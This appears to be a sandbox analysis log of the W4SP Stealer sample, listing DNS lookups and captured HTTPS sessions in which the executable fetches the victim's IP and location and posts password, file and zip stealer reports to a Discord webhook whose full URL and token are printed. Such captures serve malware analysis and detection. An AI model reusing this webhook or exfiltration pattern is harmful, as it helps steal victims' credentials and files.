                                                                                                                                                                                          Sep 8, 2023 07:31:37.469054937 CEST8.8.8.8192.168.2.70xd4fcNo error (0)api.gofile.io51.38.43.18A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:39.360116005 CEST8.8.8.8192.168.2.70xf4f6No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:39.360116005 CEST8.8.8.8192.168.2.70xf4f6No error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:39.360116005 CEST8.8.8.8192.168.2.70xf4f6No error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:39.360116005 CEST8.8.8.8192.168.2.70xf4f6No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:40.915772915 CEST8.8.8.8192.168.2.70x37f7No error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:42.579523087 CEST8.8.8.8192.168.2.70xb6ebNo error (0)ptb.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:42.579523087 CEST8.8.8.8192.168.2.70xb6ebNo error (0)ptb.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:42.579523087 CEST8.8.8.8192.168.2.70xb6ebNo error (0)ptb.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:42.579523087 CEST8.8.8.8192.168.2.70xb6ebNo error (0)ptb.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:42.579523087 CEST8.8.8.8192.168.2.70xb6ebNo error (0)ptb.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:44.006851912 CEST8.8.8.8192.168.2.70x8a5bNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:44.006851912 CEST8.8.8.8192.168.2.70x8a5bNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:44.006851912 CEST8.8.8.8192.168.2.70x8a5bNo error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:44.006851912 CEST8.8.8.8192.168.2.70x8a5bNo error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:45.385262966 CEST8.8.8.8192.168.2.70xfe02No error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:47.077600002 CEST8.8.8.8192.168.2.70x8a24No error (0)ptb.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:47.077600002 CEST8.8.8.8192.168.2.70x8a24No error (0)ptb.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:47.077600002 CEST8.8.8.8192.168.2.70x8a24No error (0)ptb.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:47.077600002 CEST8.8.8.8192.168.2.70x8a24No error (0)ptb.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:47.077600002 CEST8.8.8.8192.168.2.70x8a24No error (0)ptb.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                          • api.ipify.org
                                                                                                                                                                                          • geolocation-db.com
                                                                                                                                                                                          • ptb.discord.com
                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          0192.168.2.749715173.231.16.76443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:26 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                          User-Agent: Python-urllib/3.11
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:26 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.25.1
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:26 GMT
                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                          Content-Length: 13
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                          2023-09-08 05:31:26 UTC0INData Raw: 31 39 31 2e 31 30 31 2e 36 31 2e 31 39
                                                                                                                                                                                          Data Ascii: 191.101.61.19


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          1192.168.2.749717159.89.102.253443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:27 UTC0OUTGET /jsonp/191.101.61.19 HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Host: geolocation-db.com
                                                                                                                                                                                          User-Agent: Python-urllib/3.11
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:28 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:27 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          2023-09-08 05:31:28 UTC0INData Raw: 62 32 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 43 68 69 63 61 67 6f 22 2c 22 70 6f 73 74 61 6c 22 3a 22 36 30 36 30 32 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 31 2e 38 34 38 33 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 38 37 2e 36 35 31 37 2c 22 49 50 76 34 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 22 2c 22 73 74 61 74 65 22 3a 22 49 6c 6c 69 6e 6f 69 73 22 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: b2callback({"country_code":"US","country_name":"United States","city":"Chicago","postal":"60602","latitude":41.8483,"longitude":-87.6517,"IPv4":"191.101.61.19","state":"Illinois"})0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          10192.168.2.749738159.89.102.253443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:46 UTC9OUTGET /jsonp/191.101.61.19 HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Host: geolocation-db.com
                                                                                                                                                                                          User-Agent: Python-urllib/3.11
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:46 UTC9INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:46 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          2023-09-08 05:31:46 UTC10INData Raw: 62 32 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 43 68 69 63 61 67 6f 22 2c 22 70 6f 73 74 61 6c 22 3a 22 36 30 36 30 32 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 31 2e 38 34 38 33 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 38 37 2e 36 35 31 37 2c 22 49 50 76 34 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 22 2c 22 73 74 61 74 65 22 3a 22 49 6c 6c 69 6e 6f 69 73 22 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: b2callback({"country_code":"US","country_name":"United States","city":"Chicago","postal":"60602","latitude":41.8483,"longitude":-87.6517,"IPv4":"191.101.61.19","state":"Illinois"})0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          11192.168.2.749739162.159.136.232443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:47 UTC10OUTPOST /api/webhooks/1145292889375641651/LiLYNKzxiXzK4I7mlokWLchk9nrkUSyIf0sFNc2iJ59Y-dUSvo_8s9RlN3C733kDbhnM HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Content-Length: 509
                                                                                                                                                                                          Host: ptb.discord.com
                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:47 UTC10OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 46 52 4f 4e 54 44 45 53 4b 20 7c 20 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 31 34 34 30 36 34 31 33 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 57 34 53 50 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 40 57 34 53 50 20 53 54 45 41 4c 45 52
                                                                                                                                                                                          Data Ascii: {"content": ":flag_us: - `user | 191.101.61.19 (United States)`", "embeds": [{"color": 14406413, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "W4SP | File Stealer"}, "footer": {"text": "@W4SP STEALER
                                                                                                                                                                                          2023-09-08 05:31:47 UTC11INHTTP/1.1 204 No Content
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:47 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          set-cookie: __dcfduid=0143a5564e0911eea6a03a623f62f3b7; Expires=Wed, 06-Sep-2028 05:31:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                          x-ratelimit-reset: 1694151109
                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dB0yd6BkIh4F8lq2lRMPwoxa9pFUcEJ20LfJeNLAx3cabvpDQyMgD7z75oO0is9RviH64U0xvKg8y7Edne7%2BcAFrN2HI269hg4nV125a2EFTPmi%2BDLCoGL%2BvhvU2s4Eb9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                          Set-Cookie: __sdcfduid=0143a5564e0911eea6a03a623f62f3b7bdaac95bc3d553048bc919b05a437ec594e924ef40a7877beb3a07a8aa50c5b4; Expires=Wed, 06-Sep-2028 05:31:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                          Set-Cookie: __cfruid=f9730bd2a9a87fa9858ecea225829124730cc485-1694151107; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                          2023-09-08 05:31:47 UTC12INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 4d 77 45 62 67 36 61 4d 57 61 68 6f 41 36 33 64 71 48 69 59 5f 57 51 6d 30 30 64 56 68 70 4c 57 4a 73 39 35 35 66 4f 5f 71 4a 67 2d 31 36 39 34 31 35 31 31 30 37 38 33 37 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 30 33 34 63 65 61 37 30 65 61 63 30 61 64 31 2d 4c 41 53 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: Set-Cookie: _cfuvid=MwEbg6aMWahoA63dqHiY_WQm00dVhpLWJs955fO_qJg-1694151107837-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8034cea70eac0ad1-LAS


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          2192.168.2.749718162.159.137.232443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:28 UTC0OUTPOST /api/webhooks/1145292889375641651/LiLYNKzxiXzK4I7mlokWLchk9nrkUSyIf0sFNc2iJ59Y-dUSvo_8s9RlN3C733kDbhnM HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Content-Length: 443
                                                                                                                                                                                          Host: ptb.discord.com
                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:28 UTC1OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 46 52 4f 4e 54 44 45 53 4b 20 7c 20 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 57 34 53 50 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 31 35 37 38 31 34 30 33 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 40 57 34 53 50 20 53 54 45 41 4c 45 52 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 39 36 33 31 31 34 33 34 39 38 37 37 31 36 32 30 30 34 2f
                                                                                                                                                                                          Data Ascii: {"content": ":flag_us: - `user | 191.101.61.19 (United States)`", "embeds": [{"title": "W4SP Zips", "description": "\n\n", "color": 15781403, "footer": {"text": "@W4SP STEALER", "icon_url": "https://cdn.discordapp.com/attachments/963114349877162004/
                                                                                                                                                                                          2023-09-08 05:31:29 UTC1INHTTP/1.1 204 No Content
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:29 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          set-cookie: __dcfduid=f62cfb184e0811eeb1f36a6f6f0f0f5d; Expires=Wed, 06-Sep-2028 05:31:29 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                          x-ratelimit-reset: 1694151090
                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=USlFMiM5wNk5hN0b4sK2dj6g%2F4q0aLIkgrqFMdpjaFh1MQVFtfKqZf369d7H%2Fs9zrn%2Fg8oryg%2FqWMyd7%2FBU8TFiAjgcpTN83RY%2FL%2Fxq1dzHNJsfxX%2FjqtkjRJIvDyXx%2FDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                          Set-Cookie: __sdcfduid=f62cfb184e0811eeb1f36a6f6f0f0f5d905f5fd4954785be51c15ed7a549c991ac2abbf7e85bddb6ce3cd4de987e2f2a; Expires=Wed, 06-Sep-2028 05:31:29 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                          Set-Cookie: __cfruid=7aca78dc5a05c90251608f74cd1523c348787fc4-1694151089; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                          2023-09-08 05:31:29 UTC2INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 35 56 4d 56 38 6d 49 59 64 5a 67 6b 62 4c 59 58 34 62 5a 31 6c 51 66 69 52 56 6c 48 6d 48 63 46 79 33 38 71 5a 6d 4a 49 58 4a 73 2d 31 36 39 34 31 35 31 30 38 39 32 33 30 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 30 33 34 63 65 33 32 36 62 65 64 30 39 65 64 2d 4c 41 53 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: Set-Cookie: _cfuvid=5VMV8mIYdZgkbLYX4bZ1lQfiRVlHmHcFy38qZmJIXJs-1694151089230-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8034ce326bed09ed-LAS


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          3192.168.2.749719173.231.16.76443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:32 UTC3OUTGET / HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                          User-Agent: Python-urllib/3.11
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:32 UTC3INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.25.1
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:32 GMT
                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                          Content-Length: 13
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                          2023-09-08 05:31:32 UTC3INData Raw: 31 39 31 2e 31 30 31 2e 36 31 2e 31 39
                                                                                                                                                                                          Data Ascii: 191.101.61.19


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          4192.168.2.749720159.89.102.253443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:35 UTC3OUTGET /jsonp/191.101.61.19 HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Host: geolocation-db.com
                                                                                                                                                                                          User-Agent: Python-urllib/3.11
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:35 UTC3INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:35 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          2023-09-08 05:31:35 UTC3INData Raw: 62 32 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 43 68 69 63 61 67 6f 22 2c 22 70 6f 73 74 61 6c 22 3a 22 36 30 36 30 32 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 31 2e 38 34 38 33 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 38 37 2e 36 35 31 37 2c 22 49 50 76 34 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 22 2c 22 73 74 61 74 65 22 3a 22 49 6c 6c 69 6e 6f 69 73 22 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: b2callback({"country_code":"US","country_name":"United States","city":"Chicago","postal":"60602","latitude":41.8483,"longitude":-87.6517,"IPv4":"191.101.61.19","state":"Illinois"})0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          5192.168.2.749724162.159.137.232443C:\Users\user\Desktop\KzqQe0QtRd.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-09-08 05:31:36 UTC3OUTPOST /api/webhooks/1145292889375641651/LiLYNKzxiXzK4I7mlokWLchk9nrkUSyIf0sFNc2iJ59Y-dUSvo_8s9RlN3C733kDbhnM HTTP/1.1
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          Content-Length: 554
                                                                                                                                                                                          Host: ptb.discord.com
                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          2023-09-08 05:31:36 UTC4OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 46 52 4f 4e 54 44 45 53 4b 20 7c 20 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 57 34 53 50 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 46 6f 75 6e 64 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 5c 75 64 38 33 64 5c 75 64 64 31 31 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a 20 50 61 73 73 77 6f 72 64 73 20 46 6f 75 6e 64 5c 6e 3a 6c 69 6e 6b 3a 20 5c 75 32 30 32 32 20 5b 77 34 73 70 50 61 73 73 77 6f 72 64 2e 74 78 74 5d 28 46 61 6c 73 65 29 22 2c 20 22 63 6f 6c 6f 72 22
                                                                                                                                                                                          Data Ascii: {"content": ":flag_us: - `user | 191.101.61.19 (United States)`", "embeds": [{"title": "W4SP | Password Stealer", "description": "**Found**:\n\n\n**Data:**\n\ud83d\udd11 \u2022 **0** Passwords Found\n:link: \u2022 [w4spPassword.txt](False)", "color"
                                                                                                                                                                                          2023-09-08 05:31:37 UTC4INHTTP/1.1 204 No Content
                                                                                                                                                                                          Date: Fri, 08 Sep 2023 05:31:37 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          set-cookie: __dcfduid=fae735924e0811ee981132ac1ac9451c; Expires=Wed, 06-Sep-2028 05:31:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                          x-ratelimit-reset: 1694151098
                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eMJ03x9YURPk4RZhVGbRljWOoiF0YuI8fgXOjxHbmILSBK1XsKS%2Bt0MUCty8y7NXmpnnrJq3PeZGYPouqeKusoLhMirGV7LckMopV3ZZGtiX6WaDMupxdT7mSxl12pju7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                          Set-Cookie: __sdcfduid=fae735924e0811ee981132ac1ac9451cd3fc292a85a24f9f0b4de018fff42f161ae06508341aabe111705f148b782242; Expires=Wed, 06-Sep-2028 05:31:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                          Set-Cookie: __cfruid=fc0a8906f9dae8d64fb802819195d858cc133aae-1694151097; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                          2023-09-08 05:31:37 UTC6INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6e 2e 6c 50 48 4a 64 4c 79 48 7a 68 66 6b 53 58 4f 42 58 39 47 77 51 34 6a 65 79 78 5a 48 4f 2e 56 6c 4a 6b 39 63 36 34 44 67 51 2d 31 36 39 34 31 35 31 30 39 37 31 36 33 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 30 33 34 63 65 36 34 36 62 66 66 30 39 66 39 2d 4c 41 53 0d 0a 0d 0a
